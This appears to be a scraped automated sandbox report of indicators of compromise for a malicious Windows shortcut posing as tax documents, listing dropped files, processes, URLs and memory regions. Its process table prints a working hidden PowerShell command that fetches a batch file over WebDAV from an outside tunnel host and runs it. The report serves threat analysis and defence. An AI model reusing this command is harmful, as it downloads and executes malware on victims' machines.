IOC Report
tax-docs-2023.download.lnk

loading gif

Files

File Path
Type
Category
Malicious
tax-docs-2023.download.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Thu Mar 14 09:29:06 2024, mtime=Thu Mar 14 09:29:06 2024, atime=Thu Mar 14 09:29:06 2024, length=450560, window=hidenormalshowminimized
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k3ffpg2o.qq2.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kkqrkhp1.pc1.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UF8KRGFCLU4T1S69RS2P.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms (copy)
data
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c "Copy-Item '\\mixer-brake-tan-cleaner.trycloudflare.com@SSL\DavWWWRoot\bas.cmd' \"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\bas.cmd\" -WindowStyle Hidden"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://oneget.orgX
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
https://oneget.org
unknown
There are 3 hidden URLs, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
21E5773F000
trusted library allocation
page read and write
7FFE7E120000
trusted library allocation
page read and write
7FFE7DE0D000
trusted library allocation
page execute and read and write
EF824BA000
stack
page read and write
7FFE7DEB6000
trusted library allocation
page read and write
7FFE7DEB0000
trusted library allocation
page read and write
21E47720000
heap
page execute and read and write
21E47580000
trusted library allocation
page read and write
21E48F8D000
trusted library allocation
page read and write
7FFE7DE10000
trusted library allocation
page read and write
7FFE7DFB1000
trusted library allocation
page read and write
21E5FA1C000
heap
page read and write
7FFE7DFE2000
trusted library allocation
page read and write
21E457BA000
heap
page read and write
7FFE7E0A0000
trusted library allocation
page read and write
7FFE7DE1B000
trusted library allocation
page read and write
21E45717000
heap
page read and write
7FFE7E070000
trusted library allocation
page read and write
7FFE7DE03000
trusted library allocation
page execute and read and write
21E47731000
trusted library allocation
page read and write
7FFE7DFF0000
trusted library allocation
page execute and read and write
21E457E0000
heap
page read and write
21E456E0000
heap
page read and write
7FFE7DFC0000
trusted library allocation
page execute and read and write
7FFE7E140000
trusted library allocation
page read and write
7FFE7E150000
trusted library allocation
page read and write
7FFE7E090000
trusted library allocation
page read and write
21E47962000
trusted library allocation
page read and write
21E5F7F7000
heap
page execute and read and write
21E4577C000
heap
page read and write
21E5F800000
heap
page read and write
21E5F81F000
heap
page read and write
7FFE7E130000
trusted library allocation
page read and write
21E5FA42000
heap
page read and write
EF822FD000
stack
page read and write
21E4935C000
trusted library allocation
page read and write
7FFE7E0F0000
trusted library allocation
page read and write
21E45870000
heap
page read and write
7FFE7E020000
trusted library allocation
page read and write
21E477BA000
trusted library allocation
page read and write
21E47170000
trusted library allocation
page read and write
7FFE7E0B0000
trusted library allocation
page read and write
7FFE7DE04000
trusted library allocation
page read and write
21E456E9000
heap
page read and write
EF827BB000
stack
page read and write
21E47140000
trusted library allocation
page read and write
7FFE7E0E0000
trusted library allocation
page read and write
EF825BE000
stack
page read and write
21E45590000
heap
page read and write
EF81D4D000
stack
page read and write
21E5F900000
heap
page read and write
7FFE7E050000
trusted library allocation
page read and write
7FFE7E010000
trusted library allocation
page read and write
21E5F8E0000
heap
page read and write
EF8318F000
stack
page read and write
7FFE7E100000
trusted library allocation
page read and write
21E457C0000
heap
page read and write
21E475E3000
heap
page read and write
7FFE7E040000
trusted library allocation
page read and write
21E5F825000
heap
page read and write
21E48FB9000
trusted library allocation
page read and write
21E47200000
heap
page read and write
7FFE7DFBA000
trusted library allocation
page read and write
21E45690000
heap
page read and write
21E47180000
heap
page readonly
21E4577A000
heap
page read and write
21E5F8BA000
heap
page read and write
7FFE7E0D0000
trusted library allocation
page read and write
21E45792000
heap
page read and write
21E488B1000
trusted library allocation
page read and write
21E49014000
trusted library allocation
page read and write
21E48F6C000
trusted library allocation
page read and write
7FFE7E030000
trusted library allocation
page read and write
EF8207D000
stack
page read and write
21E471C0000
heap
page read and write
21E5F848000
heap
page read and write
EF8217B000
stack
page read and write
21E5F7F0000
heap
page execute and read and write
EF82437000
stack
page read and write
21E5F87E000
heap
page read and write
7FFE7DEBC000
trusted library allocation
page execute and read and write
21E48362000
trusted library allocation
page read and write
EF8273E000
stack
page read and write
21E476F0000
heap
page execute and read and write
7FFE7DF20000
trusted library allocation
page execute and read and write
7DF49EC00000
trusted library allocation
page execute and read and write
21E457BC000
heap
page read and write
7FFE7DFD0000
trusted library allocation
page execute and read and write
EF82539000
stack
page read and write
7FFE7DEE6000
trusted library allocation
page execute and read and write
7FFE7E110000
trusted library allocation
page read and write
EF8227E000
stack
page read and write
21E48D03000
trusted library allocation
page read and write
21E49360000
trusted library allocation
page read and write
7FFE7DE20000
trusted library allocation
page read and write
21E48F6E000
trusted library allocation
page read and write
7FFE7DEC0000
trusted library allocation
page execute and read and write
21E45780000
heap
page read and write
EF8237A000
stack
page read and write
EF821FF000
stack
page read and write
7FFE7E060000
trusted library allocation
page read and write
21E47205000
heap
page read and write
21E47583000
trusted library allocation
page read and write
EF81DCE000
stack
page read and write
21E5FA00000
heap
page read and write
EF823BF000
stack
page read and write
21E45772000
heap
page read and write
21E57731000
trusted library allocation
page read and write
21E5FA8A000
heap
page read and write
21E475D0000
heap
page read and write
21E577A0000
trusted library allocation
page read and write
7FFE7E000000
trusted library allocation
page read and write
21E5FA0C000
heap
page read and write
7FFE7E0C0000
trusted library allocation
page read and write
EF8263F000
stack
page read and write
EF820FE000
stack
page read and write
EF81CC5000
stack
page read and write
7FFE7DFA0000
trusted library allocation
page read and write
21E5F920000
heap
page read and write
21E49102000
trusted library allocation
page read and write
21E5FA4B000
heap
page read and write
21E45875000
heap
page read and write
21E47190000
trusted library allocation
page read and write
21E578E3000
trusted library allocation
page read and write
7FFE7DE02000
trusted library allocation
page read and write
21E456F3000
heap
page read and write
7FFE7E080000
trusted library allocation
page read and write
7FFE7DE5C000
trusted library allocation
page execute and read and write
21E45670000
heap
page read and write
21E49297000
trusted library allocation
page read and write
There are 120 hidden memdumps, click here to show them.